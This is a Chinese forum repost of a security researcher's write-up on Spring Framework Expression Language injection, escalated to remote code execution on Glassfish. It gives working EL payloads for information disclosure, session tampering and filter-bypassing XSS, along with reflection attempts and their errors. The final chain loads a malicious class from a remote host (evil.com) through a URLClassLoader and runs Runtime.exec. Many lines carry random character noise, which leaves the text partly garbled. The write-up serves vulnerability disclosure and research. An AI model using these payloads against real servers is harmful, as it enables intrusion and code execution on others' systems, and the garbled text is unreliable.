Remote Code with, n) I8 [# I& P: q; q
Expression Language Injection0 ^. M* d8 F* G' e1 Y" b6 ^& L3 n
Spring Framework脆弱性—DanAmodio
w/ w: @: F2 {全世界超过22,000组织已经下载了131.4万过时的Spring Framework,使用在业务中/ @5 {5 I: G: P4 [5 S) e! Q
可能会存在风险。6 H# D1 e( q- j' g0 r/ x7 h7 X
在2011年,来自Minded Security 的Stefano Di Paola 和来自Aspect Security的7 a- I9 q' F4 f4 U( K0 K
Arshan Dabirsiaghi 在Spring Framework中发现了一个有趣模式。Stefano创造了Expression Language (EL) 注入。他们的发现披露了某些双重的解析EL 的spring 标签可
: B' K" d9 n) p; F F, w+ C0 i以泄露服务器上的敏感数据。这是由于spring 提供了独立于jsp/servlet容器的EL支持,
w- e6 z3 T6 p7 ~! |( t: T! d以此来作为向下兼容的一种方式。因此在jsp2.0之前,EL 是不被支持的。这个功能在当前; V5 H% n8 U( e: m! f
版本中是默认打开的,应用程序使用了此模式描述是易受攻击的。
' W% M9 C v& {6 `由于每个应用程序并不都会出现反射xss这种弱点,虽然很难量化它的深度和广度,但) X& U3 P7 k3 u
我们根据Sonatype最新的统计知道,全世界超过22,000的组织下载Spring 3.0.5以下版* b" ?- E/ X3 [
本已经超过131.4 万。Point-in-fact, one large retail organization consumed 241 different artifacts, 4,119 total downloads。4 P( k1 ^0 F2 R9 B0 \
这些版本不支持禁用double EL resolution.; i* T# G g0 G( y/ d( G ?7 F2 m
这个问题原来的影响是信息泄露,但是我将举例说明它如何在Glassfish 和其他包含/ @5 r, u2 a+ B( C, P3 [& o
EL2.2容器上可能进行远程代码执行。# x9 Y+ V, a* N6 g- s
这是一个原始信息泄露的攻击例子:
& r1 [, K0 D1 h: n& H$ h请求:
7 d2 o! N i$ Z+ C& D! D2 ^3 k+ O, d3 Mttp://vulnerable.com/foo?message=${applicationScope}
, M* H9 J. t$ `+ `# S: ]0 b9 v& V7 P到达以下内容页面:
4 }7 r( j- F& T1 ]$ |* c" `结果将输出一些包含内部服务器信息calsspath 和本地工作目录- }# W0 D: ~, x9 d/ L
你也可以做一些其他事情,如这样:( C+ N' l/ V! K5 Y; H8 ^
${9999+1}
_. h/ \# C! s# f2 e还可以访问session 对象和beans- ?, P% A" C* X7 ~) }" ~
${employee.lastName}
! l; j" E, Y1 H- d, v在执行Glassfish上客户端应用程序的渗透测试时,我遇到了同样的模式,知道大概是5 A0 d- l/ @5 Z6 s4 J s
EL 注入,做了额外的测试后,确认了这一发现,同时延续下去,我想挖掘一些有滋味的东5 x- d+ m2 X, ?5 n( h
西,比如XSS.8 @, `+ ^6 K) I( U& R
哎,应用程序的输入过滤终止了我的请求,因此去掉了””标签: |0 ]& v( \) K9 C5 G1 a' y& D
突发奇想,我想“我可以在JAVA中进行字符操纵,为什么我不试试利用EL来绕过过滤
# o+ E1 ~$ Z2 y7 } y2 t呢?”+ L2 ]! z1 E& ^; c& Q+ |& S" L
因此,我尝试巳缦拢�
, F& X' C% X6 C% ehttp://vulnerable.com/app?code=${param.foo.replaceAll(“P”,”Q”)}foo=PPPP" w- T Z; A, t- Q0 s( T7 Y' a% [1 b" ^9 f
P: S! X9 ]% L$ h/ Y% O( z3 S
我注意到返回的错误代码时QQQQQ,由于String.replaceall 方法已经被调用,所以返
# O( `" ], B. a; G1 o+ _) {( ^回的文本被插入进了spring:message 标签。9 c/ E2 M% J, ^4 C% k4 _* y+ t" Y
这里是一个最终绕过过滤的实例:/ B7 a& k3 ~: J) U5 i
http://vulnerable.com/app?code=${param.foo.replaceAll(“P”,””)}&foo=PscriptQalert(1) /scriptQ
2 ]' K* Q: p4 ^0 ]) I) s它运行的很好,接下来一个小时我什么都没想。然后我认识到他是真的真的糟糕的。为
& Y/ ~ S2 P F% t什么可以在EL中像这样插入方法。接下来,我还可以做些其他好玩的事情呢?( _4 B* \$ C2 x, i! J, h
经过一番研究,我学习到EL2.2 增加了方法调用。
. K Z$ x3 X' G9 L2 F4 W- h我写了一个快速测试应用程序代码并且检测一些功能
2 G6 p+ r8 I; |+ F, l" ^' ^- x. u${pageContext.request.getSession().setAttribute(“account”,”123456″)}
9 c4 T6 C3 N0 w+ u${pageContext.request.getSession().setAttribute(“admin”,true)}
, C! ~( J5 [( B: o2 I- M好了,会话对象修改是一个明显的风险。我真的想接触到对象,但是我没有一个直接的
8 P7 d* I4 t' ]指向pageContext对象,也许我可以使用反射,像String.getClass().forName(string)?
( D6 S8 ^/ L+ Y${“”.getClass().forName(“java.net.Socket”).newInstance().connect(“127.0.0.1
; {+ F" {3 ?4 {0 }9 d“, 1234)}# `: V( y6 t& n8 G) _2 r( \( W) P
${“”.getClass().forName(“java.lang.Runtime”)}
; i1 Q$ G4 F2 r9 F9 ] \, T哇,没有方法让它工作,由于可以接触到任何东西这可是灾难性的。不幸的是,它是不( S+ `7 f& p, J2 c/ s6 {: v _
可能调用newinstance()初始化许多危险类(如Runtime),由于它们没有提供默认的构造函
( q4 }$ H. L+ S* u8 s) L% z数,我们无法创建对象。当它请求null或者一个空数组,getMethods()[0].invoke()会有- s; H% L' b/ p) y; B0 S
一些问题。在传递数据到方法之前,EL 似乎是理解它为一个字符串字面值。我猜测是由于! E( `) G" S, T
方法签名invoke(Object obj, Object„ args); G# E- U* ~9 k+ M2 B
Jeff Williams (Aspect Security 和OWASP核心创始人) ,Arshan,和我都思考这个问
( l% ^2 w8 g1 ~1 ?; }4 J( U题,以让它可以工作起来。
7 R: a2 h5 @: X; w$ B' f; j! Z2 E; h漏洞利用: M v. e0 Y% b
我在墙上撞的我的脑袋bangbang响,我已经用尽了所有想法,现在我们公开这个,我
; P! Q/ I/ V8 H+ [2 b; ^希望你们中的一些JAVA奇才告诉我我是如此的可笑。
; S1 \& T. ]5 z/ H这里有一些我试过的失败的用例,为了试图让它工作的用例:1 `8 s, V2 Y D
写文件到文件系统
- n5 S& D6 l8 K1 H 试图载入org.springframework.expression.spel.standard.SpelExpressionParser.
5 _2 |. I, a k' o3 Q我认为这些可以很好的工作,但是我不能找到合适的类来载入。3 k2 o# z* B; m# @& h- t3 E! a
${pageContext.getClass().getClassLoader().loadClass(“org.springframework.expression.spel.standard.SpelExpressionParser”)}
8 ~: U9 t+ R+ kjavax.servlet.jsp.el.ELException: java.lang.ClassNotFoundException:% L: _+ Y: c* ^" K$ G& f5 w0 j1 K3 Q
org.springframework.expression.spel.standard.SpelExpressionParser not found% J- W l( U4 S' i$ b, o
by$ v( N6 R: W0 p1 A4 u' H$ W
org.glassfish.web.javax.servlet.jsp [194]." O1 z% p9 n j" ~3 z4 v) A% o
利用反射来修改java.lang.Runtime.currentRuntime的属性为Public
: D1 B% Z5 Q0 W' n) R" C8 w1 |0 H 利用反射来创建一个新的Runtime(and watch the world burn)
/ X* K8 i8 V$ h${pageContext.request.getSession().setAttribute(“rtc”,”".getClass().forName+ B9 F' @$ t$ P& H
(“java.lang.Runtime”)).getDeclaredConstructors()[0])}& o4 o4 c! O/ N/ s* W7 I
${pageContext.request.getSession().getAttribute(“rtc”).setAccessible(true)}
7 k& \6 K7 [2 e 使用java.lang.ProcessBuilder6 X: S. _# a% k2 }* R' C& G4 d
用表达式语言来评估表达式语言
; X7 H' Q7 [1 Y7 B/ TExpression-ception ! 在这点我想我快疯了,载体并没有任何实际意义.5 O3 d7 E* W- W& _' J: l
${pageContext.getExpressionEvaluator().parseExpression(“pageContext.request* z4 k6 Y+ Y. @% D1 j# ]
“,”".getClass(),null)}4 ]% D" d9 \+ h7 D2 d, l9 A: h
创建一个ObjectInputStream,序列化一个类并将其作为一个参数发送(也有点疯狂)' ~3 i, j. W9 U- F5 t
我在使用一个空数组通过Method.invoke()时失败了很多次
9 i3 E4 l2 }8 X# }6 v# A& h“”.getClass().forName(“java.lang.Runtime”).getMethods()[5].invoke(param.foo W1 C1 B0 Y' U( w: ^. C# R
.getClass().forName(“java.lang.Runtime”),”".getClass().forName(“java.util.A
6 }# t; T( N6 }& ]# y2 arrayList”).newInstance().toArray())
5 o2 W j" b3 D& j( mjava.lang.IllegalArgumentException: wrong number of arguments
* T! a V l0 f最后,有一天晚上我被绊倒在一个问题前:我能得到一个URLClassLoader,因此我可3 z6 V, E M% R$ j
以创建一个恶意class文件并且指向类装载器.6 R J8 `3 G- A
我写了一个JAVA 类,它试图打开服务器上的计算器,来证明远程代码执行:5 [ e L$ n" }) p6 Y
public class Malicious {8 B: [/ A3 q* j: K+ {! C' \* q8 s9 l1 j
public Malicious() {* x% }2 [( C- q( e1 B. V) f- j
try {4 d5 k4 s3 _* x3 n. I
java.lang.Runtime.getRuntime().exec(“open -a Calculator”); //Mac+ V- @+ }9 A R6 d7 j* ~
java.lang.Runtime.getRuntime().exec(“calc.exe”); //Win
* I8 u- V2 v/ k0 V; q. f} catch (Exception e) {
; h. w) Q" C/ d- W: }% O0 {}6 p2 S: k6 Y. m5 Z! e+ o
}* {$ t4 U- R& q6 y
我们创建了一个数组列表将被用于构造一个新的URLClassLoader,它需要被存储在回
$ a9 L' |0 I2 }: _* s话中,因此它可以被使用.
/ a0 d# s& E5 T${pageContext.request.getSession().setAttribute(“arr”,”".getClass().forName4 w. D# R3 d7 j' ~5 g8 ^% `
(“java.util.ArrayList”).newInstance())}
4 c5 T% N5 z0 S- P, wURLClassLoader 提供了一个newInstance 方法,它接受URL对象数组。我们需要创建
/ q/ m- D& f& L: X: ~% C6 b一个新的包含我们恶意代码路径的URL。ServletContext可以提供给我们一个URL对象和
2 F4 S& i1 M+ I: d' ZgetResource(string) 方法,但是我们不可能直接创建一个新的实例。然而URI提供了一个
/ T" E2 i- ]6 q# S: N. q我们可以调用的create(string)方法,然后转换对一个URL对象。5 d1 B ^& e! t
${pageContext.request.getSession().getAttribute(“arr”).add(pageContext.getServletContext().getResource(“/”).toURI().create(“http://evil.com/path/to/wh+ r+ Y% a3 X$ ?# G+ |
ere/malicious/classfile/is/located/”).toURL())}
6 H% H# P: J* a9 \8 \然后我们发现了一个到URLClassLoader指示器,因此newInstance 方法可以被调用,
) p6 H! \: o3 ~8 q. {恶意类文件被装载并创建,触发远程代码.
: \. G) _. r9 p2 h; O${pageContext.getClass().getClassLoader().getParent().newInstance(pageConte
# D# x1 R7 Y" l; axt.request.getSession().getAttribute(“arr”).toArray(pageContext.getClass().; n% [0 r6 w6 E" K% H/ m
getClassLoader().getParent().getURLs())).loadClass(“Malicious”).newInstance9 W# n b5 T# ?, a4 u) t
()} |
发表于 2013-2-16 21:47:24
收藏
支持
反对